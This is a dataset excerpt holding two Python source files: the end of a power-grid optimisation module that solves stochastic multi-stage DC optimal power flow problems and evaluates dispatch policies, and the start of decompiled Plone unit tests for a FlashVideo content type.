g_list.append(g)\n\n A_list += [Arow1,Arow2,Arow3]\n b_list += [self.b+self.D*self.d_forecast[t+i],\n self.oy, # (add p_prev for first stage)\n self.oz]\n \n u_list += [self.p_max,\n self.q_max,\n self.w_max,\n self.r_max, # (add available r)\n self.y_max,\n self.z_max]\n l_list += [self.p_min,\n self.q_min,\n self.w_min,\n self.os,\n self.y_min,\n self.z_min]\n \n H = block_diag(H_list,format='coo')\n g = np.hstack(g_list)\n \n A = bmat(A_list,format='coo')\n b = np.hstack(b_list)\n\n # Stages after start stage\n if A_list[3:]:\n An = bmat([a[6:] for a in A_list[3:]],format='coo')\n bn = np.hstack((b_list[3:]))\n else:\n An = None\n bn = None\n\n u = np.hstack((u_list))\n l = np.hstack((l_list))\n\n # Checks\n num_vars = self.num_x*(tf-t+1)\n assert(H.shape == (num_vars,num_vars))\n assert(g.shape == (num_vars,))\n assert(A.shape == ((self.num_bus+self.num_p+self.num_z)*(tf-t+1),num_vars))\n assert(b.shape == ((self.num_bus+self.num_p+self.num_z)*(tf-t+1),))\n assert(u.shape == (num_vars,))\n assert(l.shape == (num_vars,))\n assert(np.all(l < u))\n\n # Problem\n problem = QuadProblem(H,g,A,b,l,u)\n problem.An = An\n problem.bn = bn\n return problem\n\n def construct_x(self,p=None,q=None,w=None,s=None,y=None,z=None):\n \"\"\"\n Constructs stage vector from components.\n \n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n\n return np.hstack((p,q,w,s,y,z))\n\n def eval_F(self,t,x,w):\n \"\"\"\n Evaluates current cost.\n \"\"\"\n \n p,q,w,s,y,z = self.separate_x(x)\n\n return (np.dot(self.gp,p) +\n 0.5*np.dot(p,self.Hp*p) + # slow gen cost\n np.dot(self.gq,q) +\n 0.5*np.dot(q,self.Hq*q)) # fast gen cost\n\n def separate_x(self,x):\n \"\"\"\n Separates stage vector into components.\n \n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n \n offset = 0\n p = x[offset:offset+self.num_p]\n offset += self.num_p\n \n q = x[offset:offset+self.num_q]\n offset += self.num_q\n\n w = x[offset:offset+self.num_w]\n offset += self.num_w\n\n s = x[offset:offset+self.num_s]\n offset += self.num_s\n\n y = x[offset:offset+self.num_y]\n offset += self.num_y\n\n z = x[offset:offset+self.num_z]\n offset += self.num_z\n\n return p,q,w,s,y,z\n\n def get_num_stages(self):\n \"\"\"\n Gets number of stages.\n \n Returns\n -------\n num : int\n \"\"\"\n \n return self.T\n\n def get_size_x(self):\n \"\"\"\n Gets size of stage vector x.\n\n Returns\n -------\n size : int\n \"\"\"\n\n return self.num_x\n\n def get_x_prev(self):\n \"\"\"\n Gets constant x for time before t=0.\n\n Returns\n -------\n x_prev : vector\n \"\"\"\n \n return self.x_prev\n\n def solve_stage_with_cuts(self,t,w,x_prev,A,b,quiet=False,tol=1e-4,init_data=None):\n \"\"\"\n Solves approximate stage problem for given realization of\n uncertainty and cuts that approximate cost-to-go function.\n \"\"\"\n \n assert(t >= 0)\n assert(t < self.T)\n assert(x_prev.shape == (self.num_x,))\n assert(A.shape[1] == self.num_x)\n assert(b.shape == (A.shape[0],))\n\n p_prev = x_prev[:self.num_p]\n inf = self.parameters['infinity']*1e2\n\n H = bmat([[self.Hp,None,None,None,None,None], # p\n [None,self.Hq,None,None,None,None], # q\n [None,None,self.Ow,None,None,None], # w\n [None,None,None,self.Os,None,None], # s\n [None,None,None,None,self.Oy,None], # y\n [None,None,None,None,None,self.Oz]], # z\n format='coo')\n\n g = np.hstack([self.gp, # p\n self.gq, # q\n self.ow, # w\n self.os, # s\n self.oy, # y\n self.oz]) # z\n\n Aeq = bmat([[self.G,self.C,-self.A,self.R,None,None], # power balance\n [self.Ip,None,None,None,-self.Iy,None], # ramp eq\n [None,None,self.J,None,None,-self.Iz]], # thermal lim eq\n format='coo')\n \n beq = np.hstack([self.b+self.D*self.d_forecast[t],\n p_prev,\n self.oz])\n \n u = np.hstack([self.p_max,\n self.q_max,\n self.w_max,\n w, # avail r\n self.y_max,\n self.z_max])\n l = np.hstack([self.p_min,\n self.q_min,\n self.w_min,\n self.os,\n self.y_min,\n self.z_min])\n \n # Cuts (h are slack vectors, v is scalar)\n num_cuts = A.shape[0]\n Oh = coo_matrix((num_cuts,num_cuts))\n oh = np.zeros(num_cuts)\n Ih = eye(num_cuts,format='coo')\n Ev = np.ones((num_cuts,1))\n Ov = coo_matrix((1,1))\n if num_cuts > 0:\n \n H = bmat([[H ,None,None],\n [None,Ov,None],\n [None,None,Oh]],\n format='coo')\n\n g = np.hstack((g,1.,oh))\n \n Aeq = bmat([[Aeq,None,None],\n [A,Ev,-Ih]],\n format='coo')\n \n beq = np.hstack((beq,\n -b))\n\n u = np.hstack((u,\n inf,\n np.ones(num_cuts)*inf))\n \n l = np.hstack((l, # x\n 0., # v\n oh)) # h (slack)\n \n # Construct problem\n QPproblem = QuadProblem(H,g,Aeq,beq,l,u)\n\n # Warm start\n if init_data is not None:\n x0 = init_data['x']\n lam0 = init_data['lam']\n mu0 = init_data['mu']\n pi0 = init_data['pi']\n QPproblem.x = np.hstack((x0,np.zeros(g.size-x0.size)))\n QPproblem.lam = np.hstack((lam0,np.zeros(beq.size-lam0.size)))\n QPproblem.mu = np.hstack((mu0,np.zeros(g.size-x0.size)))\n QPproblem.pi = np.hstack((pi0,np.zeros(g.size-x0.size)))\n \n # Set up solver\n solver = OptSolverIQP()\n solver.set_parameters({'quiet': quiet, \n 'tol': tol})\n \n # Solve\n solver.solve(QPproblem)\n\n # Results\n results = solver.get_results()\n\n # Stage optimal point\n x = solver.get_primal_variables()\n \n # Optimal duals\n lam,nu,mu,pi = solver.get_dual_variables()\n\n # Solutions\n xt = x[:self.num_x]\n y_offset = self.num_p+self.num_q+self.num_w+self.num_s\n Q = np.dot(QPproblem.g,x)+0.5*np.dot(x,QPproblem.H*x)\n gQ = np.hstack(((-mu+pi)[y_offset:y_offset+self.num_y],\n self.oq,self.ow,self.os,self.oy,self.oz))\n\n # Return\n return xt,Q,gQ,results\n\n def solve_stages(self,t,w_list,x_prev,g_corr=[],init_data=None,tf=None,quiet=False,tol=1e-4,next_stage=False):\n \"\"\"\n Solves stages using given realizations of uncertainty \n and cost-to-go slope corrections.\n \n Parameters\n ----------\n t : int (start stage)\n w_list : list of random vectors for stage t,...,T\n x_prev : vector of previous stage variables\n g_corr : list of slope corrections for stage t,...,T\n tf : int (end stage)\n init_data :\n quiet : {True,False}\n tol : \n next_stage : \n \n Returns\n -------\n x : stage solution\n Q : total cost\n gQ : subgradient with respect to x_prev\n \"\"\"\n\n if tf is None:\n tf = self.T-1\n\n if len(g_corr) == 0:\n g_corr = (tf-t+1)*[np.zeros(self.num_x)]\n \n assert(t >= 0)\n assert(t < self.T)\n assert(tf >= 0)\n assert(tf < self.T)\n assert(t <= tf)\n assert(len(w_list) == tf-t+1)\n assert(len(g_corr) == tf-t+1)\n assert(x_prev.shape == (self.num_x,))\n \n p_prev = x_prev[:self.num_p]\n\n # Base\n if tf == self.T-1:\n QPproblem = self.base_problem[t]\n else:\n QPproblem = self.construct_base_problem(t,tf=tf)\n \n # Updates\n p_offset = 0\n s_offset = self.num_p+self.num_q+self.num_w\n QPproblem.b[self.num_bus:self.num_bus+self.num_y] = p_prev\n for i in range(tf-t+1):\n QPproblem.g[p_offset:p_offset+self.num_p] = self.gp+g_corr[i][:self.num_p]\n QPproblem.u[s_offset:s_offset+self.num_s] = w_list[i]\n p_offset += self.num_x\n s_offset += self.num_x\n\n # Warm start\n if init_data is not None:\n QPproblem.x = init_data['x']\n QPproblem.lam = init_data['lam']\n QPproblem.mu = init_data['mu']\n QPproblem.pi = init_data['pi']\n \n if not quiet:\n QPproblem.show()\n\n # Set up solver\n solver = OptSolverIQP()\n solver.set_parameters({'quiet': quiet, \n 'tol': tol})\n \n # Solve\n solver.solve(QPproblem)\n\n # Results\n results = solver.get_results()\n\n # Stage optimal point\n x = solver.get_primal_variables()\n \n # Optimal duals\n lam,nu,mu,pi = solver.get_dual_variables()\n\n # Solutions\n xt = x[:self.num_x]\n y_offset = self.num_p+self.num_q+self.num_w+self.num_s\n Q = np.dot(QPproblem.g,x)+0.5*np.dot(x,QPproblem.H*x)\n gQ = np.hstack(((-mu+pi)[y_offset:y_offset+self.num_y],\n self.oq,self.ow,self.os,self.oy,self.oz))\n\n # Others\n results['xn'] = x[self.num_x:].copy()\n results['gQn'] = None\n results['lamn'] = None\n results['mun'] = None\n results['pin'] = None\n results['Qn'] = None\n\n # Next stage sens\n if t < self.T-1 and next_stage:\n Pn = eye(x.size-self.num_x,x.size,self.num_x,format='csr')\n xn = Pn*x\n un = Pn*QPproblem.u\n ln = Pn*QPproblem.l\n An = QPproblem.An\n bn = QPproblem.bn\n bn[self.num_bus:self.num_bus+self.num_y] = x[:self.num_p]\n gn = Pn*QPproblem.g\n Hn = Pn*QPproblem.H*Pn.T\n lamn = lam[self.num_bus+self.num_p+self.num_z:]\n solver.solve(QuadProblem(Hn,gn,An,bn,ln,un,x=xn,lam=lamn,mu=Pn*mu,pi=Pn*pi))\n xn = solver.get_primal_variables()\n lamn,nun,mun,pin = solver.get_dual_variables() \n results['gQn'] = np.hstack(((-mun+pin)[y_offset:y_offset+self.num_y],\n self.oq,self.ow,self.os,self.oy,self.oz))\n results['lamn'] = lamn\n results['mun'] = mun\n results['pin'] = pin\n results['Qn'] = np.dot(gn,xn)+0.5*np.dot(xn,Hn*xn)\n \n # Return\n return xt,Q,gQ,results\n\n def solve_stage_adjustments(self,t,r,p,quiet=False,tol=1e-4):\n \"\"\"\n Evaluates stage fast-gen adjustments cost.\n \n Parameters\n ----------\n t : int (stage)\n r : vector of current renewable powers\n p : vector of current slow-gen powers\n quiet : {True,False}\n\n Returns\n -------\n q : stage t vars (q,w,s,z)\n Q : stage t cost\n \"\"\"\n\n # Check\n assert(0 <= t < self.T)\n assert(r.shape == (self.num_r,))\n assert(p.shape == (self.num_p,))\n \n # Objective\n H = bmat([[self.Hq,None,None,None], # q\n [None,self.Ow,None,None], # w\n [None,None,self.Os,None], # s\n [None,None,None,self.Oz]], # z\n format='coo')\n\n g = np.hstack((self.gq, # q\n self.ow, # w\n self.os, # s\n self.oz)) # z\n\n # Linear constraints\n A = bmat([[self.C,-self.A,self.R,None],\n [None,self.J,None,-self.Iz]],format='coo')\n \n b = np.hstack((self.b+self.D*self.d_forecast[t]-self.G*p,self.oz))\n \n # Bounds\n u = np.hstack((self.q_max,self.w_max,r,self.z_max))\n l = np.hstack((self.q_min,self.w_min,self.os,self.z_min))\n\n # Problem\n QPproblem = QuadProblem(H,g,A,b,l,u)\n if not quiet:\n QPproblem.show()\n\n # Set up solver\n solver = OptSolverIQP()\n solver.set_parameters({'quiet': quiet, \n 'tol': tol})\n \n # Solve\n solver.solve(QPproblem)\n\n # Stage optimal point\n xadj = solver.get_primal_variables()\n q = xadj[:self.num_q]\n w = xadj[self.num_q:self.num_q+self.num_w]\n s = xadj[self.num_q+self.num_w:self.num_q+self.num_w+self.num_s]\n z = xadj[self.num_q+self.num_w+self.num_s:]\n \n # Return\n return q,w,s,z\n\n def is_point_feasible(self,t,x,x_prev,w):\n \"\"\"\n Checks wether point is feasible for the given stage.\n\n Parameters\n ----------\n a lot\n\n Returns\n -------\n flag : {True,False}\n \"\"\"\n\n r = w\n p,q,w,s,y,z = self.separate_x(x)\n p_prev,q_prev,w_prev,s_prev,y_prev,z_prev = self.separate_x(x_prev)\n\n try: \n eps = 1e-4\n assert 0 <= t < self.T, 'time'\n assert np.all(self.y_min <= y), 'ramp min'\n assert np.all(self.y_max >= y), 'ramp_max'\n assert np.all(self.z_min <= z), 'thermal_min'\n assert np.all(self.z_max >= z), 'thermal_max'\n assert np.all(self.q_min <= q), 'fast_min'\n assert np.all(self.q_max >= q), 'fast_max'\n assert np.all(self.p_min <= p), 'slow_min'\n assert np.all(self.p_max >= p), 'slow_max'\n assert np.all(self.w_min <= w), 'ang_min'\n assert np.all(self.w_max >= w), 'ang_max'\n assert np.all(0 <= s), 'ren_min'\n assert np.all(r >= s), 'ren_max'\n assert norm(self.G*p+self.C*q+self.R*s-self.A*w-self.b-self.D*self.d_forecast[t])/norm(self.A.data) < eps, 'power flow'\n assert norm(self.J*w-z)/norm(self.J.data) < eps, 'thermal eq'\n assert norm(p-p_prev-y)/(norm(p)+norm(p_prev)+norm(y)) < eps, 'ramp eq'\n return True\n except AssertionError as e:\n print(e)\n return False\n\n def sample_w(self,t,observations):\n \"\"\"\n Samples realization of renewable powers for the given stage\n given the observations.\n\n Parameters\n ----------\n t : int (stage)\n observations : list\n\n Parameters\n ----------\n w : vector\n \"\"\"\n\n assert(t >= 0)\n assert(t < self.T)\n assert(len(observations) == t)\n\n r_eps = self.parameters['r_eps']\n r_ramp_max = self.parameters['r_ramp_max']\n r_ramp_freq = self.parameters['r_ramp_freq']\n\n r = self.r_forecast[t]+self.L_sca[t]*self.L_cov*np.random.randn(self.num_r) # perturbed\n r = np.maximum(np.minimum(r,self.r_max),r_eps) # cap bound\n if observations and np.random.rand() <= 1.-r_ramp_freq:\n dr = r_ramp_max*self.r_max\n rprev = observations[-1]\n return np.maximum(np.minimum(r,rprev+dr),rprev-dr) # ramp bound with prob 1-eps\n else:\n return r\n\n def sample_W(self,t,t_from=0,observations=[]):\n \"\"\"\n Samples realization of renewable powers up\n to the given stage.\n \n Parameters\n ----------\n t : int (stage)\n t_from : int\n observations : list\n\n Parameters\n ----------\n W : list\n \"\"\"\n\n assert(t >= 0)\n assert(t < self.T)\n assert(len(observations) == t_from)\n if t_from > t:\n return []\n\n samples = list(observations)\n for tau in range(t_from,t+1):\n samples.append(self.sample_w(tau,samples))\n assert(len(samples) == t+1)\n return samples[t_from:]\n\n def predict_w(self,t,observations):\n \"\"\"\n Predicts renewable powers for the given stage\n given the observations.\n\n Parameters\n ----------\n t : int (stage)\n observations : list\n\n Returns\n -------\n w : vector\n \"\"\"\n\n assert(t >= 0)\n assert(t < self.T)\n assert(len(observations) == t)\n\n r_pred = np.zeros(self.num_r)\n for i in range(self.parameters['num_samples']):\n r_pred *= float(i)/float(i+1)\n r_pred += self.sample_w(t,observations)/(i+1.)\n return r_pred\n\n def predict_W(self,t,t_from=0,observations=[]):\n \"\"\"\n Predicts renewable powers up to the\n given stage.\n\n Parameters\n ----------\n t : int (stage)\n\n Returns\n -------\n W : list\n \"\"\"\n \n assert(t >= 0)\n assert(t < self.T)\n assert(len(observations) == t_from)\n if t_from > t:\n return []\n \n r_pred = np.zeros((t-t_from+1,self.num_r))\n for i in range(self.parameters['num_samples']):\n r_pred *= float(i)/float(i+1)\n r_pred += np.array(self.sample_W(t,t_from,observations))/(i+1.)\n predictions = [r_pred[tau,:] for tau in range(t-t_from+1)]\n assert(len(predictions) == t-t_from+1)\n return predictions\n\n def set_parameters(self,params):\n \"\"\"\n Sets problem parameters.\n \n Parameters\n ----------\n params : dic\n \"\"\"\n \n for key,value in list(params.items()):\n if key in self.parameters:\n self.parameters[key] = value\n \n def show(self,scenario_tree=None):\n \"\"\"\n Shows problem information.\n\n Parameters\n ----------\n sceneario_tree : \n \"\"\"\n\n vargen_cap = np.sum(self.r_max)\n vargen_for = [np.sum(r) for r in self.r_forecast]\n vargen_unc = [np.sum(np.sqrt(tril(triu((s**2.)*self.r_cov)).tocoo().data)) for s in self.L_sca]\n load_for = [np.sum(d) for d in self.d_forecast]\n load_max = max(load_for)\n \n print('\\nStochastic Multi-Stage DCOPF')\n print('----------------------------')\n print('num buses : %d' %self.num_bus)\n print('num branches : %d' %self.num_br)\n print('num gens : %d' %self.num_p)\n print('num vargens : %d' %self.num_r)\n print('num loads : %d' %self.num_l)\n print('num stages : %d' %self.T)\n print('vargen cap : %.2f (%% of max load)' %(100.*vargen_cap/load_max))\n print('vargen corr_rad : %d (edges)' %(self.corr_radius))\n print('vargen corr_val : %.2f (unitless)' %(self.corr_value))\n\n if scenario_tree is not None:\n scenario_tree.show()\n\n # Draw\n if self.parameters['draw']:\n \n import matplotlib.pyplot as plt\n from matplotlib import rcParams\n import seaborn\n\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n rcParams.update({'figure.autolayout': True})\n seaborn.set_style(\"ticks\")\n\n N = 20\n colors = seaborn.color_palette(\"muted\",N)\n \n # Vargen forecast\n plt.subplot(2,2,1)\n plt.plot([100.*r/load_max for r in vargen_for])\n plt.xlabel(r'stage')\n plt.ylabel(r'vargen forecast (\\% of max load)')\n plt.axis([0,self.T-1,0.,100.])\n plt.grid()\n\n # Vargen uncertainty\n plt.subplot(2,2,2)\n plt.plot([100.*u/vargen_cap for u in vargen_unc])\n plt.xlabel(r'stage')\n plt.ylabel(r'vargen uncertainty (\\% of local cap)')\n plt.axis([0,self.T-1,0.,100.])\n plt.grid()\n \n # Vargen profile\n plt.subplot(2,2,3)\n plt.plot([r/max(vargen_for) for r in vargen_for])\n plt.xlabel(r'stage')\n plt.ylabel(r'vargen profile')\n plt.axis([0,self.T-1,0.,1.])\n plt.grid()\n \n # Load profile\n plt.subplot(2,2,4)\n plt.plot([l/max(load_for) for l in load_for])\n plt.xlabel(r'stage')\n plt.ylabel(r'load profile')\n plt.axis([0,self.T-1,0.,1.])\n plt.grid()\n \n # Vargen prediction\n fig = plt.figure(figsize=(6,5))\n plt.hold(True)\n for i in range(N):\n R = [np.sum(w) for w in self.sample_W(self.T-1)]\n plt.plot(range(1,self.T+1),[100.*r/load_max for r in R],color=colors[i])\n R = [np.sum(w) for w in self.predict_W(self.T-1)]\n plt.plot(range(1,self.T+1),[100.*r/load_max for r in R],color='black',linewidth=3.)\n plt.xlabel(r'stage',fontsize=22)\n plt.ylabel(r'power (\\% of max load)',fontsize=22)\n plt.axis([1,self.T,0.,100.])\n plt.tick_params(axis='both',which='major',labelsize=18)\n plt.tick_params(axis='both',which='minor',labelsize=18)\n plt.title(r'%s: Aggregate Renewable Powers' %self.parameters['name'],fontsize=22,y=1.05)\n plt.grid()\n\n # Scenario tree\n if scenario_tree is not None:\n scenario_tree.draw()\n\n # Vargen prediction from scenario tree\n if scenario_tree is not None:\n fig = plt.figure()\n plt.hold(True)\n for i in range(N):\n R = [np.sum(n.get_w()) for n in scenario_tree.sample_branch(self.T-1)]\n plt.plot([100.*r/load_max for r in R],color=colors[i])\n R = [np.sum(w) for w in self.predict_W(self.T-1)]\n plt.plot([100.*r/load_max for r in R],color='black',linewidth=3.)\n plt.xlabel(r'stage',fontsize=22)\n plt.ylabel(r'\\% of max load',fontsize=22)\n plt.axis([0,self.T-1,0.,100.])\n plt.tick_params(axis='both',which='major',labelsize=20)\n plt.tick_params(axis='both',which='minor',labelsize=20)\n plt.title(r'Total Renewable Powers (Scenerio Tree)')\n plt.grid()\n\n # Vargen closests branch from scenario tree\n if scenario_tree is not None:\n fig = plt.figure()\n plt.hold(True)\n for i in range(3):\n W = self.sample_W(self.T-1)\n R1 = [np.sum(w) for w in W]\n R2 = [np.sum(n.get_w()) for n in scenario_tree.get_closest_branch(W)]\n plt.plot([100.*r/load_max for r in R1],color=colors[i],linestyle='-')\n plt.plot([100.*r/load_max for r in R2],color=colors[i],linestyle='--')\n plt.xlabel(r'stage',fontsize=22)\n plt.ylabel(r'\\% of max load',fontsize=22)\n plt.axis([0,self.T-1,0.,100.])\n plt.tick_params(axis='both',which='major',labelsize=20)\n plt.tick_params(axis='both',which='minor',labelsize=20)\n plt.title(r'Closest Branch from Scenerio Tree')\n plt.grid()\n plt.show()\n\n def simulate_policies(self,sim_id):\n \"\"\"\n Simulates policies for a given\n realization of uncertainty.\n\n Parameters\n ----------\n policies : list\n R : list\n sim_id : int\n\n Returns\n -------\n a lot\n \"\"\"\n\n t0 = time.time()\n \n policies = self.policies\n R = self.samples[sim_id]\n\n assert(len(R) == self.T)\n\n print('simulation %d,' %sim_id, end=' ')\n\n num = len(policies)\n dtot = np.zeros(self.T)\n rtot = np.zeros(self.T)\n cost = dict([(i,np.zeros(self.T)) for i in range(num)])\n ptot = dict([(i,np.zeros(self.T)) for i in range(num)])\n qtot = dict([(i,np.zeros(self.T)) for i in range(num)])\n stot = dict([(i,np.zeros(self.T)) for i in range(num)])\n x_prev = dict([(i,self.x_prev) for i in range(num)])\n for t in range(self.T):\n r = R[t]\n dtot[t] = np.sum(self.d_forecast[t])\n rtot[t] = np.sum(r)\n for i in range(num):\n x = policies[i].apply(t,x_prev[i],R[:t+1])\n p,q,w,s,y,z = self.separate_x(x)\n for tau in range(t+1):\n cost[i][tau] += (np.dot(self.gp,p)+\n 0.5*np.dot(p,self.Hp*p)+ # slow gen cost\n np.dot(self.gq,q)+\n 0.5*np.dot(q,self.Hq*q)) # fast gen cost\n ptot[i][t] = np.sum(p)\n qtot[i][t] = np.sum(q)\n stot[i][t] = np.sum(s)\n x_prev[i] = x.copy()\n\n print('time %.2f min' %((time.time()-t0)/60.))\n \n return dtot,rtot,cost,ptot,qtot,stot\n\n def evaluate_policies(self,policies,num_sims,seed=1000,num_procs=0,outfile='',ref_pol=''):\n \"\"\"\n Simulates operation policies.\n\n Parameters\n ----------\n policies : list of StochProblemMS_Policy\n num_runs : int\n seed : int\n outfile : string (name of output file)\n ref_pol : string (name of refernece policy)\n \"\"\"\n\n assert(len(policies) > 0)\n\n from multiprocess import Pool,cpu_count,Process\n \n if not num_procs:\n num_procs = cpu_count()\n \n if not outfile:\n outfile = 'evaluation.csv'\n\n csvfile = open(outfile,'wb')\n writer = csv.writer(csvfile)\n\n np.random.seed(seed)\n\n print('Evaluating policies with %d processes' %num_procs)\n \n # Eval\n self.policies = policies\n self.samples = [self.sample_W(self.T-1) for j in range(num_sims)]\n if num_procs > 1:\n pool = Pool(num_procs)\n func = pool.map\n else:\n func = map\n t0 = time.time()\n results = func(lambda i: self.simulate_policies(i), range(num_sims))\n t1 = time.time() \n print('Total time: %.2f min' %((t1-t0)/60.))\n\n # Process\n num_pol = len(policies)\n dtot,rtot,cost,ptot,qtot,stot = list(zip(*results))\n dtot = np.average(np.array(dtot),axis=0)\n rtot = np.average(np.array(rtot),axis=0)\n cost = dict([(i,np.average(np.array([cost[j][i] for j in range(num_sims)]),axis=0)) for i in range(num_pol)])\n ptot = dict([(i,np.average(np.array([ptot[j][i] for j in range(num_sims)]),axis=0)) for i in range(num_pol)])\n qtot = dict([(i,np.average(np.array([qtot[j][i] for j in range(num_sims)]),axis=0)) for i in range(num_pol)])\n stot = dict([(i,np.average(np.array([stot[j][i] for j in range(num_sims)]),axis=0)) for i in range(num_pol)])\n \n # Checks\n assert(dtot.shape == (self.T,))\n assert(rtot.shape == (self.T,))\n for i in range(num_pol):\n assert(cost[i].shape == (self.T,))\n assert(ptot[i].shape == (self.T,))\n assert(qtot[i].shape == (self.T,))\n assert(stot[i].shape == (self.T,))\n\n # Ref policy\n try:\n iref = [p.name for p in policies].index(ref_pol)\n except ValueError:\n iref = 0\n \n # Write\n writer.writerow([self.num_bus,num_sims])\n writer.writerow([p.get_name() for p in policies])\n writer.writerow([p.get_construction_time() for p in policies])\n writer.writerow(['d','r']+num_pol*['cost','p','q','s'])\n for t in range(self.T):\n row = [dtot[t],rtot[t]]\n for i in range(num_pol):\n row += [cost[i][t]/cost[iref][t],\n ptot[i][t],\n qtot[i][t],\n stot[i][t]]\n writer.writerow(row)\n csvfile.close()\n","sub_path":"gridopt/stochastic/multi_stage_DCOPF/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":41931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"489200185","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\Products\\FlashVideo\\tests\\test_FlashVideo.py\n# Compiled at: 2009-03-02 16:14:25\n\"\"\"Unit tests for FlashVideo class\"\"\"\nimport os, sys, types, mimetypes\nif __name__ == '__main__':\n execfile(os.path.join(sys.path[0], 'framework.py'))\nfrom Acquisition import aq_base\nimport transaction\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone import utils\nfrom Products.FlashVideo.content.FlashVideo import FlashVideo\nfrom Products.FlashVideo.config import *\nfrom Products.FlashVideo.FLVHeader import FLVHeaderError\nfrom Products.FlashVideo.tests.utils import getRequest\nfrom Products.FlashVideo.tests.BaseTest import PloneFunctionalTestCase\nfrom Products.FlashVideo.tests.BaseTest import PloneIntegrationTestCase\nfrom Products.FlashVideo.tests.BaseTest import PloneUnitTestCase\nVIDEO_ID = 'video'\n\nclass FlashVideoUnitTests(PloneUnitTestCase):\n \"\"\"Test class for FlashVideo class. Things that need to be \n tested:\n - changing object id (from title not from file)\n - setting attributes (mainly file and image)\n - resolution ofter uploading a file\n - access to 'screenshot' image\n - access to different screenshot scales\n - getting movie width and height (from image resolution) \n \"\"\"\n __module__ = __name__\n portal_type = FLASHVIDEO_PORTALTYPE\n object_id = VIDEO_ID\n\n def test___bobo_traverse__(self):\n \"\"\"Test tricks to have access to image field accessible as\n 'screenshot' URL\n \"\"\"\n video = self.createInstance()\n request = getRequest()\n image = self.getImageFile()\n video.setScreenshot(image)\n obj = video.__bobo_traverse__(request, 'screenshot')\n self.assertNotEqual(obj, None)\n obj = video.__bobo_traverse__(request, 'screenshot_mini')\n self.assertNotEqual(obj, None)\n return\n\n def test_setATCTFileContent(self):\n \"\"\"Test overriden method that should contstruct a valid id\n from title instead of making one from file name\n \"\"\"\n video = self.createInstance()\n movie = self.getMovieFile()\n empty = video.getFile()\n if type(empty) == types.StringType:\n self.assertEqual(empty, '')\n else:\n self.assertEqual(empty.get_size(), 0)\n video._setATCTFileContent(movie)\n self.assertNotEqual(video.getFile(), '')\n self.assertEqual(video.getId(), self.object_id)\n self.assertNotEqual(video.getId(), movie.filename)\n\n def test_setWidth(self):\n \"\"\"Simple test for setting width\"\"\"\n video = self.createInstance()\n self.assertNotEqual(video.getWidth(), 333)\n video.setWidth(333)\n self.assertEqual(video.getWidth(), 333)\n\n def test_setHeight(self):\n \"\"\"Simple test for setting height\"\"\"\n video = self.createInstance()\n self.assertNotEqual(video.getHeight(), 333)\n video.setHeight(333)\n self.assertEqual(video.getHeight(), 333)\n\n def test_setFile(self):\n \"\"\"Check method that sets file. Check if width and heigh are\n set correctly\n \"\"\"\n video = self.createInstance()\n movie = self.getMovieFile()\n empty = video.getFile()\n if type(empty) == types.StringType:\n self.assertEqual(empty, '')\n else:\n self.assertEqual(empty.get_size(), 0)\n self.assertEqual(video.getWidth(), '')\n self.assertEqual(video.getHeight(), '')\n video.setFile(movie)\n self.assertEqual(video.getWidth(), 130)\n self.assertEqual(video.getHeight(), 70)\n file_ = video.getFile()\n self.assertNotEqual(file_, '')\n self.assertNotEqual(file_.get_size(), 0)\n self.assertNotEqual(file_.getContentType(), FLASHVIDEO_MIMETYPE)\n\n def test_setFile_bad(self):\n \"\"\"Check if error is raised when uploading wrong file\"\"\"\n video = self.createInstance()\n image = self.getImageFile()\n self.assertRaises(FLVHeaderError, video.setFile, image)\n\n def test_getMovieWidthHeight1(self):\n \"\"\"Check if width of video is set according to resolution of screenshot.\"\"\"\n video = self.createInstance()\n movie = self.getMovieFile()\n image = self.getImageFile()\n self.assertEqual(video.getMovieWidth(), DEFAULT_VIDEO_WIDTH)\n self.assertEqual(video.getMovieHeight(), DEFAULT_VIDEO_HEIGHT)\n video.setScreenshot(image)\n self.assertEqual(video.getMovieWidth(), 130)\n self.assertEqual(video.getMovieHeight(), 70)\n\n def test_getMovieWidthHeight2(self):\n \"\"\"Check if width of video is set according to resolution of movie.\"\"\"\n video = self.createInstance()\n movie = self.getMovieFile()\n image = self.getImageFile()\n self.assertEqual(video.getMovieWidth(), DEFAULT_VIDEO_WIDTH)\n self.assertEqual(video.getMovieHeight(), DEFAULT_VIDEO_HEIGHT)\n video.setFile(movie)\n self.assertEqual(video.getMovieWidth(), 130)\n self.assertEqual(video.getMovieHeight(), 70)\n\n def test_createObject(self):\n \"\"\"Test creation of simple class instance\"\"\"\n self.createInstance()\n ids = self.folder.objectIds()\n self.assertEqual(self.object_id in ids, True)\n movie = self.folder._getOb(self.object_id)\n self.assertEqual(movie.portal_type, FLASHVIDEO_PORTALTYPE)\n self.assertEqual(movie.getId(), self.object_id)\n\n def test_getId(self):\n \"\"\"Check if object id is changed after upload\"\"\"\n fakefile = self.getMovieFile()\n id = self.folder.invokeFactory(self.portal_type, id=self.object_id, file=fakefile)\n self.assertEqual(id, self.object_id)\n obj = self.folder._getOb(id)\n self.assertEqual(obj.getId(), self.object_id)\n self.assertNotEqual(obj.getId(), fakefile.filename)\n\n def test_hasScreenshot(self):\n \"\"\"Setting up screenshot and checking if exists\"\"\"\n video = self.createInstance()\n movie = self.getMovieFile()\n image = self.getImageFile()\n video.setFile(movie)\n self.assertEqual(video.hasScreenshot(), False)\n video.setScreenshot(image)\n self.assertEqual(video.hasScreenshot(), True)\n\n def test_getConfigString(self):\n \"\"\"Test if configuration code in javascript changes\n when screenshot is defined.\n \"\"\"\n video = self.createInstance()\n movie = self.getMovieFile()\n image = self.getImageFile()\n video.setFile(movie)\n conf = video.getConfigString()\n self.assertEqual(conf.find(\"/screenshot'\") >= 0, False)\n video.setScreenshot(image)\n conf = video.getConfigString()\n self.assertEqual(conf.find(\"/screenshot'\") >= 0, True)\n\n\nclass FlashVideoIntegrationTestCase(PloneIntegrationTestCase):\n \"\"\"Functional tests checking that all configuation works\"\"\"\n __module__ = __name__\n portal_type = FLASHVIDEO_PORTALTYPE\n object_id = VIDEO_ID\n type_properties = (('immediate_view', 'flashvideo_view'), ('default_view', 'flashvideo_view'), ('content_icon', 